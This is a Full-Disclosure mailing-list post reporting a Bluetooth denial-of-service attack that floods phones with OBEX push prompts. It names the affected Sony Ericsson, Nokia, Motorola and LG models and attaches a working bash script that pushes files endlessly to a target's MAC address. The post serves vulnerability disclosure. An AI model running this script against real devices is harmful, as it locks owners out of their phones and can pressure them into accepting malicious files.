Re: [Full-disclosure] Bluetooth DoS by obex push [CORRECTED]

Sorry for some trouble with the last mail, I have corrected the text
(there were some possibly unreadable characters in it) and the
attachment is plain text now.


Hello,

during a course project studying security and privacy related to
Bluetooth, we discovered a simple but effective DoS attack using OBEX push.

Using ussp-push [1], it is possible to send out files very quickly. By
continuously trying to push a file, the target is flooded with prompts
whether to accept the file or not, which disables any other usage on the
phone, including the ability to turn off Bluetooth.
We confirmed the attack to work on the following phones (all tested ones!):

- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800

and expect nearly all available phones with Bluetooth to be vulnerable
(in contrary to the previous DoS by l2ping).

A proof-of-concept code is attached, using ussp-push and targeting a
known MAC. This could be easily extended to target all visible devices.
Plus, a user could be forced to accept a possibly malicious file with
this attack. Using only one Bluetooth-Dongle, we were able to
practically disable three phones simlutaneously.

Best regards,
Stefan Ekerfelt and Armin Hornung

[1] http://www.xmailserver.org/ussp-push.html
#!/bin/bash

checkOPUSH()
{
MAC=$1
OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)
if test "$OCHAN" != ""
then
OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')
return $OCHAN
fi
return 0
}


if test $# -ne 2
then
echo "Usage: $0 <bdaddr> <filename>"
exit 127
fi

MAC=$1
FILENAME=$2

checkOPUSH $1
OCHAN=$?

if test $OCHAN -eq 0
then
echo "Couldn't connect to $MAC via OBEX push."
exit 127
fi


while true
do
./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Bluetooth DoS by obex push
    ... Bluetooth, we discovered a simple but effective DoS attack using OBEX push. ... We confirmed the attack to work on the following phones: ...
    (Bugtraq)
  • [NEWS] OBEX Push Bluetooth DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in the way Bluetooth enabled phones handle incoming ... This could be easily extended to target all visible ...
    (Securiteam)
  • Re: Time for a new phone
    ... less if you use Bluetooth to any extent... ... The BlueTrek didn't suit ... Sony Ericsson 'phones it's dog-slow. ... lookup system Motorola still insist on using. ...
    (uk.rec.motorcycles)
  • Re: Safari will not start
    ... Where would those other bluetooth property files be, ... I haven't lost a single setting with any of the mobile phones that are paired with my two machines and 5 systems! ... That has nothing at all to do with settings like whether or not ask for password on wake up / screen saver is checked, and the selected screen saver module! ... Desktop picts or screensavers haven't changed on any of the machines I've served, neither has preset login informations of any kind. ...
    (comp.sys.mac.apps)
  • Re: bluetooth file transfer in python
    ... to poll for mobile phones with bluetooth switched on in the area then ... I guess you'd use OBEX to send the file, ... you can call the obexftp program from ... Since Bluetooth communications are supported using sockets in GNU/ ...
    (comp.lang.python)